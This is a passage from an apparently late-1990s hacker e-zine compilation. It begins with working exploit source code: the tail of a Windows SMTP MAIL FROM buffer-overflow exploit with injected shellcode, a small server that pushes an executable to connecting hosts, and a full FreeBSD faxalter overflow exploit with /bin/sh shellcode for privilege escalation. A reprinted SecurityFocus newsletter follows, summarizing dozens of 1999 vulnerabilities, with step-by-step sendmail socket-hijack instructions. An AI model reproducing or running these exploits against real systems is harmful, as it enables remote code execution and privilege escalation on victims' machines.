buf[MAXBUF],packetbuf[MAXBUF+1000]; struct hostent *hs; if (argc<2){ printf("usage: %s VictimHost\n",argv[0]); return -1; } wVersionRequested = MAKEWORD( 2, 0 ); if (WSAStartup(wVersionRequested , &wsa)!=0){ printf("Winsock Initialization failed.\n"); return -1; } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf("Can not create socket.\n"); return -1; } addr.sin_family = AF_INET; addr.sin_port = htons((u_short)SMTP_PORT); if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); return -1; } addr.sin_family = hs->h_addrtype; memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length); } if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){ printf("Can not connect to specified host.\n"); return -1; } recv(sock,packetbuf,MAXBUF,0); printf("BANNER FROM \"%s\" : %s\n",argv[1],packetbuf); memset(buf,0x90,MAXBUF); buf[MAXBUF]=0; ip=JMPEAX_ADR; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR ]=0xeb; buf[JMPADR+1]=0x80; strcat(exploit_code,cmdbuf); p1=(unsigned int)LoadLibrary; p2=(unsigned int)GetProcAddress; exploit_code[0x0d]=p1&0xff; exploit_code[0x0e]=(p1>>8)&0xff; exploit_code[0x0f]=(p1>>16)&0xff; exploit_code[0x10]=(p1>>24)&0xff; exploit_code[0x1e]=p2&0xff; exploit_code[0x1f]=(p2>>8)&0xff; exploit_code[0x20]=(p2>>16)&0xff; exploit_code[0x21]=(p2>>24)&0xff; memcpy(buf+JMPADR-strlen(exploit_code)-1,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"HELO UNYUN\n"); send(sock,packetbuf,strlen(packetbuf),0); recv(sock,packetbuf,MAXBUF,0); printf("HELO: Reply from \"%s\" : %s\n",argv[1],packetbuf); sprintf(packetbuf,"MAIL FROM: UNYUN <%s@shadowpenguin.net>\r\n",buf); send(sock,packetbuf,strlen(packetbuf),0); closesocket(sock); printf("Done.\n"); return FALSE; } @HWA 15.0 Exploit Translation Server Version1.00/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za /*============================================================================= Exploit Translation Server Version1.00 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #include #include #define PORT_NUM 7000 #define BUFSIZE 1000 #define SENDFILE "xtcp.exe" int get_connection(port, listener) int port; int *listener; { struct sockaddr_in address,acc; int listening_socket,connected_socket; int reuse_addr=1,acclen=sizeof(acc); memset((char *) &address, 0, sizeof(address)); address.sin_family = AF_INET; address.sin_port = htons(port); address.sin_addr.s_addr = htonl(INADDR_ANY); listening_socket = socket(AF_INET, SOCK_STREAM, 0); if (listening_socket < 0) { perror("socket"); exit(1); } if (listener != NULL) *listener = listening_socket; setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR, (void *)&reuse_addr,sizeof(reuse_addr)); if (bind(listening_socket,(struct sockaddr *)&address, sizeof(address))<0){ perror("bind"); exit(1); } listen(listening_socket, 5); connected_socket=accept(listening_socket, (struct sockaddr *)&acc,&acclen); return connected_socket; } int main(argc, argv) int argc; char *argv[]; { int sock,listensock,i,r,l; char buf[BUFSIZE]; struct stat st; FILE *fp; if ((fp=fopen(SENDFILE,"rb"))==NULL){ printf("File not found \"%s\"\n",SENDFILE); exit(1); } stat(SENDFILE,&st); r=st.st_size/BUFSIZE+1; sock = get_connection(PORT_NUM, &listensock); for (i=0;;i++){ l=fread(buf,1,BUFSIZE,fp); if (l<=0) break; write(sock,buf,l); } fclose(fp); close(sock); } @HWA 16.0 Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za/ /* * Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp) * Brock Tellier btellier@usa.net */ #include char shell[]= /* mudge@lopht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; main (int argc, char *argv[] ) { int x = 0; int y = 0; int offset = 0; int bsize = 4093; /* overflowed buf's bytes + 4(ebp) + 4(eip) + 1 */ char buf[bsize]; int eip = 0xbfbfcfad; if (argv[1]) { offset = atoi(argv[1]); eip = eip + offset; } fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); for ( x = 0; x < 4021; x++) buf[x] = 0x90; fprintf(stderr, "NOPs to %d\n", x); for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; fprintf(stderr, "Shellcode to %d\n",x); buf[x++] = eip & 0x000000ff; buf[x++] = (eip & 0x0000ff00) >> 8; buf[x++] = (eip & 0x00ff0000) >> 16; buf[x++] = (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[bsize - 1]='\0'; execl("/usr/local/bin/faxalter", "faxalter", "-m", buf, NULL); } @HWA 17.0 Security Focus Newsletters #14 and 15 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SecurityFocus.com Newsletter #14 & 15 Table of Contents: I. INTRODUCTION 1. New Staff at SecurityFocus.com 2. Elias Levy on National Public Radio II. BUGTRAQ SUMMARY 1. Multiple Vendor CDE dtappgather Vulnerabilities (Update) 2. Canna subsystem 'uum' Buffer Overflow Vulnerability 3. Canna subsystem 'canuum' Buffer Overflow Vulnerability 4. Microsoft IE Yamaha MidiPlug Buffer Overflow Vulnerability 5. BTD Zom-Mail Buffer Overflow Vulnerability 6. AN-HTTPd CGI Vulnerabilities 8. Hylafax 'faxalter' Buffer Overflow Vulnerability 9. Microsoft IE window.open Redirect Vulnerability 10. Real Server Administrator Port Buffer Overflow Vulnerability 11. NT Spoolss.exe Buffer Overflow Vulnerabilities 12. NT Spoolss.exe DLL Insertion Vulnerability 13. Cobalt RaQ2 cgiwrap Vulnerability 14. Alibaba Multiple CGI Vulnerabilties 15. MS ActiveX CAB File Execution Vulnerability 16. Byte Fusion BFTelnet Long Username DoS Vulnerability 17. FTGate Directory Traversal Vulnerability 18. Etype Eserv Directory Traversal Vulnerability 19. Sendmail Socket Hijack Vulnerability 20. Guestbook CGI Remote Command Execution Vulnerability 21. Artisoft XtraMail Multiple DoS Vulnerabilities 22. BigIP Config UI Vulnerabilities 23. Microsoft IE for Win98 file:// Buffer Overflow Vulnerability 24. Seyon Relative Path Vulnerability 25. IrfanView32 Image File Buffer Overflow Vulnerability 26. Linux nfsd Remote Buffer Overflow Vulnerability 27. TransSoft Broker User Name Buffer Overflow Vulnerability 28. Windows 95/98 UNC Buffer Overflow Vulnerability 29. RedHat Linux csh/tcsh Vulnerability 30. Immunix StackGuard Evasion Vulnerability 31. InterScan VirusWall Long HELO Buffer Overflow Vulnerability 32. Multiple BIND Vulnerabilities 33. IMail POP3 Buffer Overflow Denial of Service Vulnerability 34. NetCPlus SmartServer3 POP Buffer Overflow Vulnerability 35. Microsoft ActiveX Error Message Vulnerability 36. MacOS9 NDS Client Inherited Login Vulnerability III. PATCH UPDATES 1. Vulnerability Patched: WFTPD Remote Buffer Overflow Vulnerability 2. Vulnerability Patched: InterScan VirusWall Long HELO Buffer Overflow Vulnerability 3. Vulnerability Patched: Windows 95/98 UNC Buffer Overflow Vulnerability 4. Vulnerability Patched: Multiple BIND Vulnerabilities 5. Vulnerability Patched: IrfanView32 Image File Buffer Overflow Vulnerability 6. Vulnerability Patched: Linux nfsd Remote Buffer Overflow Vulnerability 7. Vulnerability Patched: Cobalt RaQ2 cgiwrap Vulnerability 8. Vulnerability Patched: MS ActiveX CAB File Execution Vulnerability 9. Vulnerability Patched: Immunix StackGuard Evasion Vulnerability 10. Vulnerability Patched: IMail POP3 Buffer Overflow Denial of Service Vulnerability 11. Vulnerabilities Patched: NT Spoolss.exe Buffer Overflow Vulnerabilities and NT Spoolss.exe DLL Insertion Vulnerability 12. Vulnerability Patched: FTGate Directory Traversal Vulnerability 13. Vulnerability Patched: AN-HTTPd CGI Vulnerabilities 14. Vulnerability Patched: IBM HomePagePrint Buffer Overflow Vulnerability IV. INCIDENTS SUMMARY 1. possible trojan/virus issue solved (Thread) 2. port 109 (Thread) 3. Re: Logging hosts (Thread) 4. Mail-relaying probing (Thread) V. VULN-DEV RESEARCH LIST SUMMARY 1. Re: FreeBSD listen() (Thread) 2. ssh-1.2.27 remote buffer overflow - exploitable (Thread) 3. Re: thttpd 2.04 stack overflow (Thread) 4. MS Outlook javascript parsing bug (Thread) 5. Re: Open Port on Win98 box (Thread) 6. minor (?) mc bug (Thread) 7. [Fwd: [Fwd: ICQ 2000 trojan/worm (VD#5)]] (Thread) VI. SECURITY JOBS Seeking Staff: 1. Information Security Consultant(s) - #111 - NJ 2. Information Security Analyst - #253 - NJ 3. Sr Firewall Engineer Position 4. Sr. Mgr. Systems Security 5. Security Sales Nationwide 6. Sr. Mgr. Systems Security 7. Software Engineer #4 - Atlanta, GA 8. Website password-protection scripts programmer needed VII. SECURITY SURVEY RESULTS VIII. SECURITY FOCUS TOP 6 TOOLS 1. Security Focus Pager (NT/98) 2. Snoot 1.3.1 (UNIX) 3. BUGS 2.0.1 (NT/UNIX) 4. NSS Narr0w Security Scanner (PERL) 5. cgi-check99 v0.3 0.3 (NT/UNIX) 6. guard (UNIX) IX. SPONSOR INFORMATION - NT OBJECTives, Inc. X. SUBSCRIBE/UNSUBSCRIBE INFORMATION I. INTRODUCTION ----------------- Welcome to the Security Focus 'week in review' newsletter issues 14 & 15 sponsored by NT OBJECTives, Inc. . Issue 14 as you may have guessed failed to be delivered. It seems to have been eaten by a somewhat overworked Listserver. The last two weeks have been two of the bussiest in Bugtraq's history with 36 vulnerabilities being published over the list. 1. New Staff at SecurityFocus.com --------------------------------- We would like to take this opportunity to welcome two newcomers to the SecurityFocus.com team. Joining us are Stephanie Fohn as the Chief Operating Officer at SecurityFocus.com (sfohn@securityfocus.com) and Chip Mesec as the VP of Marketing. Stephanie Fohn - COO -------------------- Stephanie has a broad base of management and entrepreneurial experience, with particular expertise in the Internet security area. Most recently, she served as an interim senior management consultant, filling roles such as Vice President of Marketing for Tripwire Security Systems and Director of Distribution Partnerships for Infoseek. Previously, Stephanie served as director of business development and marketing for Pilot Network Services, Inc., a provider of secure Internet access for corporations. Prior to joining Pilot, Stephanie spent six years in venture capital and investment banking in the technology arena. Stephanie holds an M.S. degree in management from Massachusetts Institute of Technology and bachelor's degrees in business and psychology from University of Washington. Chip Mesec - VP Marketing ------------------------- Chip Mesec is responsible for Product and Corporate Marketing at SecurityFocus.com. Prior to joining SecurityFocus.com, Chip was the VP of Marketing with Cyber SIGN Inc., a company that marketed electronic biometric signatures. He has over 12 years of computer security and network experience with positions as Director of Product Management for Security Products at Network Associates Inc., and five years of Product Management and Marketing manager for Network General Corporation, which merged with McAfee Associates to form Network Associates. Prior to joining Network General, Chip served as a development engineer on PC and networking hardware products at AT&T Bell Laboratories. 2. Elias Levy on National Public Radio -------------------------------------- Elias Levy, aka Aleph One, was interviewed on National Public Radio on the topic of "Cyber Terrorism". RealAudio file available at: http://www.npr.org/ramfiles/me/19991112.me.10.ram II. BUGTRAQ SUMMARY 1999-11-02 to 1999-11-14 --------------------------------------------- 1. Multiple Vendor CDE dtappgather Vulnerabilities BugTraq ID: 131 Remote: No Date Published: 1999-11-03 Relevant URL: http://www.securityfocus.com/bid/131 Summary: Due to improper checking of ownership, the dtappgather utility shipped with the Common Desktop Environment allows arbitrary users to overwrite any file present on the filesystem, regardless of the owner of the file. dtappgather uses a directory of permissions 0777 to create temporary files used by each login session. /var/dt/appconfig/appmanager/generic-display-0 is not checked for existence prior to the opening of the file by dtappgather, and as such, if a user were to create a symbolic link from this file to another on the filesystem, the permissions of this file would be changed to 0666. An additional bug exists whereby dtappgather blindly uses the contents of the DTUSERSESSION environment variable. By setting this variable to point to a file on the filesystem, its permissions can also be changed. As this command takes place relative to the /var/dt/appconfig directory, a series of '..' are required to establish the root directory, after which any file can be altered. 2. Canna subsystem 'uum' Buffer Overflow Vulnerability BugTraq ID: 757 Remote: No Date Published: 1999-11-02 Relevant URL: http://www.securityfocus.com/bid/757 Summary: Canna is a Japanese input system available as free software. Canna provides a unified user interface for inputting Japanese. Canna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be used by a single customization file, romaji-to-kana conversion rules and conversion dictionaries, and input Japanese in the same way. Canna converts kana to kanji based on a client-server model and supports automatic kana-to-kanji conversion. The Canna subsystem on certain UNIX versions contains a buffer overflow in the 'uum' program. Uum is a Japanese input tty frontend for Canna. Regrettably, certain versions are vulnerable to a buffer overflow attack via unchecked user supplied data with the '-D' option. Since 'uum' is installed as SUID root this may result in a root level compromise. 3. Canna subsystem 'canuum' Buffer Overflow Vulnerability BugTraq ID: 758 Remote: No Date Published: 1999-11-02 Relevant URL: http://www.securityfocus.com/bid/758 Summary: Canna is a Japanese input system available as free software. Canna provides a unified user interface for inputting Japanese. Canna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be used by a single customization file, romaji-to-kana conversion rules and conversion dictionaries, and input Japanese in the same way. Canna converts kana to kanji based on a client-server model and supports automatic kana-to-kanji conversion. The Canna subsystem on certain UNIX versions contains a buffer overflow in the 'canuum' program. Canuum is a Japanese input tty frontend for Canna using uum. Certain versions have a buffer overflow via unchecked user supplied data in the -k,-c,-n options. Since this program is installed SUID root this attack will result in a root level compromise. 4. Microsoft IE Yamaha MidiPlug Buffer Overflow Vulnerability BugTraq ID: 760 Remote: Yes Date Published: 1999-11-02 Relevant URL: http://www.securityfocus.com/bid/760 Summary: There is a buffer overflow in the MidiPlug that may allow arbitrary code to be executed on the local host. This overflow occurs if a long "Text" variable is specified within an EMBED tag in a web page. Instructions in the text variable may be executed when a user visits the malicious web page. 5. BTD Zom-Mail Buffer Overflow Vulnerability BugTraq ID: 761 Remote: Yes Date Published: 1999-11-02 Relevant URL: http://www.securityfocus.com/bid/761 Summary: In certain versions of the BTD Zom-Mail server there exists a buffer overflow which may be remotely exploitable by malicious users. The problem in question is in the handling of overly (past 256 chars) long file names for file attachments. 6. AN-HTTPd CGI Vulnerabilities BugTraq ID: 762 Remote: Yes Date Published: 1999-11-02 Relevant URL: http://www.securityfocus.com/bid/762 Summary: Certain versions of the AN-HTTPd server contain default CGI scripts that allow code to be executed remotely. This is due to poor sanity checking on user supplied data. 7. IBM HomePagePrint Buffer Overflow Vulnerability BugTraq ID: 763 Remote: Yes Date Published: 1999-11-02 Relevant URL: http://www.securityfocus.com/bid/763 Summary: Certain versions of the IBM Web page printout software "IBM HomePagePrint " can in some instances be remotely exploited by malicious webservers. The problem lies in a buffer overflow in the code which handles IMG_SRC tags. If a page containing a specially constructed IMG SRC tag is previewed or printed using the IBM HomePagePrint software, arbitrary code can be run on the client. 8. Hylafax 'faxalter' Buffer Overflow Vulnerability BugTraq ID: 765 Remote: No Date Published: 1999-11-03 Relevant URL: http://www.securityfocus.com/bid/765 Summary: Hylafax is a popular fax server software package designed to run on multiple UNIX operating systems. Some versions of Hylafax ship with a vulnerable sub program 'faxalter'. This program is installed SUID UUCP and has a buffer overflow which if exploited will allow a malicious user to gain UUCP privileges. Because the important programs are executed as root, such as Minicom (a popular modem terminal program) or cu(1) and are in the UUCP group and therefore writable by the same group they could be trojaned by the attacker. A successful scenario in this event would lead to a root compromise. 9. Microsoft IE window.open Redirect Vulnerability BugTraq ID: 766 Remote: Yes Date Published: 1999-11-04 Relevant URL: http://www.securityfocus.com/bid/766 Summary: If window.open is called with a target URL that redirects to a client-side file and then a variable is created pointing to the contents of the new window, the contents of the new window (the local file) can be read and possibly manipulated or transmitted by other code in the webpage. 10. Real Server Administrator Port Buffer Overflow Vulnerability BugTraq ID: 767 Remote: Yes Date Published: 1999-11-04 Relevant URL: http://www.securityfocus.com/bid/767 Summary: At installation, the Real Server software randomly selects an unused port as the remote administration port. This port is used by Real Server's remote web administration feature. To access this feature, the correct port must be specified and a valid username/password pair must be entered. By sending a long response to this authentication request, the buffer can be overwritten and arbitrary code can be executed on the server. 11. NT Spoolss.exe Buffer Overflow Vulnerabilities BugTraq ID: 768 Remote: Yes Date Published: 1999-11-04 Relevant URL: http://www.securityfocus.com/bid/768 Summary: Spoolss.exe, AKA the spooler service, which handles all print requests for the NT operating system, has a number of APIs with unchecked buffers. Some of these can only be executed by Power Users or Administrators, but some are accessible to all authenticated users. Many of the overflows will write directly into the EIP register, meaning that an exploit could be created to run arbitrary code as SYSTEM. 12. NT Spoolss.exe DLL Insertion Vulnerability BugTraq ID: 769 Remote: No Date Published: 1999-11-04 Relevant URL: http://www.securityfocus.com/bid/769 Summary: The spooler service (spoolss.exe) allows local users to add their own dll files and have the spooler run them at SYSTEM level. This could lead to privilege escalation all the way up to Administrator level. The problem is in the function AddPrintProvider(). 13. Cobalt RaQ2 cgiwrap Vulnerability BugTraq ID: 777 Remote: No Date Published: 1999-11-08 Relevant URL: http://www.securityfocus.com/bid/777 Summary: Cobalt RaQ2 servers come with a program called "cgiwrap", which acts as a wrapper for cgi programs so that they run with the uid of their user instead of ' nobody'. It may be possible to cause a denial of service to websites hosted on the server or compromise web data. cgiwrap interprets subdirectories of web/ in which cgi scripts are run as user directories, and if a user is created which happens to have the same name as the directory which scripts run from - cgiwrap will try to run a file that doesn't exist in that user's directory. In a worse case, a script can be substituted and important data submitted to web forms compromised. 14. Alibaba Multiple CGI Vulnerabilties BugTraq ID: 770 Remote: Yes Date Published: 1999-11-03 Relevant URL: http://www.securityfocus.com/bid/770 Summary: There are several CGI programs that ship with the Alibaba webserver. Many of these do not do proper input handling, and therefore will allow requests for access to files outside of normal or safe webserver practice. This results in various situations where an attacker can view, overwrite, create and delete files anywhere on the server. 15. MS ActiveX CAB File Execution Vulnerability BugTraq ID: 775 Remote: Yes Date Published: 1999-11-08 Relevant URL: http://www.securityfocus.com/bid/775 Summary: A vulnerability in Outlook and Outlook Express allows remote malicious users to execute arbitrary code on the user's machine if Javascript is enabled. A malicious user can create an executable file, compress it into a cab file, and rename it to have a multimedia file extension (e.g. .MID). He can then send this file as an attachment to an Outlook user as well as some Javascript code. When the user double-clicks on the on the multimedia attachment it will save the executable file in a known location on the system. The Javascript will then execute the attachment on the target machine. 16. Byte Fusion BFTelnet Long Username DoS Vulnerability BugTraq ID: 771 Remote: Yes Date Published: 1999-11-03 Relevant URL: http://www.securityfocus.com/bid/771 Summary: BFTelnet, a telnet server for Windows NT by Byte Fusion, will crash if a user name of 3090 or more characters is supplied. 17. FTGate Directory Traversal Vulnerability BugTraq ID: 772 Remote: Yes Date Published: 1999-11-04 Relevant URL: http://www.securityfocus.com/bid/772 Summary: Certain versions of the FTGate Advanced Mail Server have a vulnerability in their web based administration interface. The vulnerability is that the webserver allows users to traverse the directory structure outside of the Webroot directory. Therefore malicious users may read files outside of their permitted areas, including but not limited to private email and password files. 18. Etype Eserv Directory Traversal Vulnerability BugTraq ID: 773 Remote: Yes Date Published: 1999-11-04 Relevant URL: http://www.securityfocus.com/bid/773 Summary: Etype's Eserv product is designed to be a one-source internet connectivity solution, incorporating mail, web, ftp, and proxy servers into one package. The web server will allow remote browsing of the entire filesystem by the usage of ../ strings in the URL. This gives an attacker read access to every file on the server's filesystem that the webserver has access to. 19. Sendmail Socket Hijack Vulnerability BugTraq ID: 774 Remote: No Date Published: 1999-11-05 Relevant URL: http://www.securityfocus.com/bid/774 Summary: Through exploiting a combination of seemingly low-risk vulnerabilities in sendmail, it is possible for a malicious local user to have an arbitrary program inherit (or "hijack") the file descriptor for the socket listening on (priviliged) port 25. The problem begins with the way sendmail handles the failure of an accept() call. The accept() call is made when a tcp syn packet is recieved by a listening tcp socket. When the three-way handshake does not complete (as is the consequence of a half-open tcp "stealth scan"), accept() fails and sendmail closes all listening sockets and sleeps for 5 seconds. The second problem is that a user can start the sendmail daemon if a more obscure argument is passed (-bD). The -bD flag tells sendmail to run as a daemon, but in foreground. User priviliges are not checked against for this option, allowing any user to start sendmail. The third problem is how sendmail reacts to a HUP signal. When a HUP is recieved, sendmail calls execve(argv[0],..) to restart itself. The problem here is obvious, since argv[0] can be changed to anything. The bigger problem here though, is that the fourth file descriptor is not closed before this is done (which happens to be the one for the listening tcp socket), thus any argv[0] which is executed via the execve() call will inherit the descriptor. The steps required to exploit this are as follows: - From another machine, use nmap to do a "half open scan" on port 25 of the target host. (this will make sendmail go to sleep for five seconds, unattached to port 25) - In the 5 seconds that sendmail spends sleeping, call sendmail -bD as a user locally on the target box with noexec and set argv[0] to the program of your choice. (noexec is a program which allows you to set argv[0] to whatever you'd like). - Send the process a HUP, which is ok since you own the process. (The program you specified in the noexec command which is to be argv[0] now has the file descriptor for the socket listening on port 25). The consequences of this are full compromise of the mail server. An attacker could write a trojan "mail server" that would respond on port 25 to legitimate smtp connections. 20. Guestbook CGI Remote Command Execution Vulnerability BugTraq ID: 776 Remote: Yes Date Published: 1999-11-05 Relevant URL: http://www.securityfocus.com/bid/776 Summary: When guest book is configured to allow for HTML posts and you have enabled server-side includes for HTML, it may be possible for an attacker to embed SSI (server-side include) code in guestbook messages. The server-side includes allow for remote command execution, including displaying of any files for which the web server has read access to (see the example): ^^ Does not need to be there. Apache will accept different formats, which can evade the regular expression in guestbook.pl, executing commands on the target host as they would [if they were put there by the author]. 21. Artisoft XtraMail Multiple DoS Vulnerabilities BugTraq ID: 791 Remote: Yes Date Published: 1999-11-09 Relevant URL: http://www.securityfocus.com/bid/791 Summary: There are several unchecked buffers in XtraMail 1.11, which when overflowed will crash the server and cause a denial of service. 1: POP3 server PASS argument Will be overflowed with a password of over 1500 characters. 2: SMTP server HELO argument Will be overflowed with a 10,000 character argument to the HELO command. 3: Control service Username XtraMail includes a remote administration utility which listens on port 32000 for logins. The username buffer will be overflowed with a string of 10,000 characters or more. 22. BigIP Config UI Vulnerabilities BugTraq ID: 778 Remote: No Date Published: 1999-11-08 Relevant URL: http://www.securityfocus.com/bid/778 Summary: BigIP is a load balancing system from F5 software. It has a web-based configuration system, which is vulnerable to several standard CGI attacks. According to Guy Cohen , it is possible to view arbitrary files on the BSDI system which it is installed on. To add to this, the configuration program is installed setuid root. This is considered a local vulnerability since htaccess authentication is required to get to the configuration area. No more information on this vulnerability is available. 23. Microsoft IE for Win98 file:// Buffer Overflow Vulnerability BugTraq ID: 779 Remote: Yes Date Published: 1999-11-09 Relevant URL: http://www.securityfocus.com/bid/779 Summary: Extremely long 'file://' URLs will overflow a buffer in IE 4 and 5 for Windows 98. The data in the URL gets passed to the EIP, so arbitrary code can be executed if it is included in the long URL. 24. Seyon Relative Path Vulnerability BugTraq ID: 780 Remote: No Date Published: 1999-11-08 Relevant URL: http://www.securityfocus.com/bid/780 Summary: Seyon uses relative pathnames to spawn two other programs which it requires. It is possible to exploit this vulnerability to obtain the priviliges which seyon runs with. It is installed (by default) setgid dialer on FreeBSD and root on Irix. 25. IrfanView32 Image File Buffer Overflow Vulnerability BugTraq ID: 781 Remote: Yes Date Published: 1999-11-09 Relevant URL: http://www.securityfocus.com/bid/781 Summary: IrfanView32, a freeware image viewer, has a problem in the handling of Adobe Photoshop generated jpegs. If a .jpg file is opened for viewing that contains the Adobe Photoshop marker in the header (8BPS) followed by a long string, the program will crash. It is possible to insert code in the string for execution. 26. Linux nfsd Remote Buffer Overflow Vulnerability BugTraq ID: 782 Remote: Yes Date Published: 1999-11-09 Relevant URL: http://www.securityfocus.com/bid/782 Summary: A remotely exploitable buffer overflow vulnerability was found in versions of Linux nfsd known to ship with Debian Linux 2.1 and RedHat Linux 5.2. When they were fixed in the respective distributions/versions, no vulnerability information was published by the vendors. The vulnerability was in removal of long directory paths on a mounted nfs share. The length of the string holding the directory name which was to be removed was not checked and the buffer holding it could be overflowed, allowing execution of arbitrary code on the nfs server as root. A consequence of this being exploited is remote root compromise. 27. TransSoft Broker User Name Buffer Overflow Vulnerability BugTraq ID: 783 Remote: Yes Date Published: 1999-11-08 Relevant URL: http://www.securityfocus.com/bid/783 Summary: If a user name of more than 2730 characters is passed to the Broker FTP server software, the program will crash. If the program is running as a service, the service will consume all available memory and crash the entire system. 28. Windows 95/98 UNC Buffer Overflow Vulnerability BugTraq ID: 792 Remote: Yes Date Published: 1999-11-02 to 1999-11-14 Relevant URL: http://www.securityfocus.com/bid/792 Summary: There is a overflowable buffer in the networking code for Windows 95 and 98 (all versions). The buffer is in the part of the code that handles filenames. By specifying an exceptionally long filename, an attacker can cause the machine to crash or execute arbitrary code. This vulnerability could be exploited remotely by including a hostile File: URL or UNC in a web page or HTML email. The attack would occur when the pagfe was loaded in a browser or the email was opened (including opening the email in a preview pane.) 29. RedHat Linux csh/tcsh Vulnerability BugTraq ID: 785 Remote: No Date Published: 1999-11-08 Relevant URL: http://www.securityfocus.com/bid/785 Summary: It may be possible to execute arbitrary commands as a user upon their login if they are using csh/tcsh. The problem has to do with the init scripts for these shells that run when the user logs in and a /tmp race condition which they are vulnerable to. 30. Immunix StackGuard Evasion Vulnerability BugTraq ID: 786 Remote: Yes Date Published: 1999-11-08 Relevant URL: http://www.securityfocus.com/bid/786 Summary: The following was taken directly from the Immunix advisory: A significant security vulnerability has been discovered by Mariusz Woloszyn that permits attackers to perpetrate successful attacks against StackGuarded programs under particular circumstances. Woloszyn is preparing a Phrack article describing this vulnerability, which we summarize here. StackGuard 1.21 effectively protects against this vulnerability. The Immunix team would like to thank Mariusz for kindly notifying us first about this vulnerability, and allowing us the time to develop and distribute a defense. Consider this vulnerable code: foo(char * arg) { char * p = arg; // a vulnerable pointer char a[25]; // the buffer that makes the pointer vulnerable gets(a); // using gets() makes you vulnerable gets(p); // this is the good part } In attacking this code, the attacker first overflows the buffer a[] with a goal of changing the value of the char * p pointer. Specifically, the attacker can cause the p pointer to point anywhere in memory, but especially at a return address record in an activation record. When the program then takes input and stores it where p points, the input data is stored where the attacker said to store it. The above attack is effective against the Random and Terminator Canary mechanisms because those methods assume that the attack is linear, i.e. that an attacker seeking to corrupt the return address must necessarily use a string operation that overflows an automatic buffer on the stack, moving up memory through the canary word, and only then reach the return address entry. The above attack form, however, allows the attacker to synthesize a pointer to arbitrary space, including pointing directly at the return address, bypassing canary protection. 31. InterScan VirusWall Long HELO Buffer Overflow Vulnerability BugTraq ID: 787 Remote: Yes Date Published: 1999-11-07 Relevant URL: http://www.securityfocus.com/bid/787 Summary: There is a buffer overflow in the HELO command of the smtp gateway which ships as part of the VirusWall product. This buffer overflow could be used to launch arbitrary code on the vulnerable server. 32. Multiple BIND Vulnerabilities BugTraq ID: 788 Remote: Yes Date Published: 1999-11-10 Relevant URL: http://www.securityfocus.com/bid/788 Summary: There are several vulnerabilities in recent BIND packages (pre 8.2.2). The first is a buffer overflow condition which is a result of BIND improperly validating NXT records. The consequence of this being exploited is a remote root compromise (assuming that BIND is running as root, which is default). The second is a denial of service which can occur if BIND does not validate SIG records properly. The next is a bug which allows attackers to cause BIND to consume more file descriptors than can be managed, causing named to crash. The fourth vulnerability is anot her denial of service which can be caused locally if certain permission conditions are met when validating zone information loaded from disk files. The last is a vulnerability has to do with closing TCP sockets. If protocols for doing so are not adhered to, BIND can be paused for 120 seconds at a time. 33. IMail POP3 Buffer Overflow Denial of Service Vulnerability BugTraq ID: 789 Remote: Yes Date Published: 1999-11-08 Relevant URL: http://www.securityfocus.com/bid/789 Summary: There is a buffer overflow in the username field when the username is between 200 and 500 characters. Although it may be possible to execute arbitrary code on the vulnerable server, current exploits only cause a denial of service on the remote machine. 34. NetCPlus SmartServer3 POP Buffer Overflow Vulnerability BugTraq ID: 790 Remote: Yes Date Published: 1999-11-11 Relevant URL: http://www.securityfocus.com/bid/790 Summary: The POP server that is part of the NetcPlus SmartServer3 email server has an unchecked buffer that could allow an attacker to execute code on the server. If the USER command is followed by an argument of over 800 characters, the input buffer will be overflowed, and data from the argument will be passed to the system to be executed at the privelege level of the SmartServ program. 35. Microsoft ActiveX Error Message Vulnerability BugTraq ID: 793 Remote: Yes Date Published: 1999-11-02 to 1999-11-14 Relevant URL: http://www.securityfocus.com/bid/793 Summary: The Windows Media Player ActiveX control, shipped with IE 5, returns a specific error code if it is instructed to load a local file that does not exist. In this way, an attacker could determine whether or not a specified file on the victim's host exists. This could be used to determine user names and other facets of system configuration. 36. MacOS9 NDS Client Inherited Login Vulnerability BugTraq ID: 794 Remote: No Date Published: 1999-11-02 to 1999-11-14 Relevant URL: http://www.securityfocus.com/bid/794 Summary: The NDS client for MacOS 9 fails to log the user out of the NDS tree when s/he logs out of the MacOS 9 system. The next user to log in to the machine will inherit the previous user's NDS access. III. PATCH UPDATES 1999-11-02 to 1999-11-02 to 1999-11-14 ------------------------------------------- 1. Vendor: Texas Imperial Software Product: WFTPD and WFTPD Pro Patch Location: http://www.wftpd.com/ Vulnerability Patched: WFTPD Remote Buffer Overflow Vulnerability BugTraq ID: 747 Relevant URLS: http://www.wftpd.com/bugpage.htm http://www.securityfocus.com/bid/747 Note: This is a new version of WFTPD (2.41). As of Nov 14, 1999, it is only available to registered WFTPD users. The 